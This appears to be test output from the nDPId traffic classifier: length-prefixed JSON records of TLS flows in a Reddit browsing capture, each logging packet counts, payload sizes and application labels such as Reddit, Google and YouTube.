-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 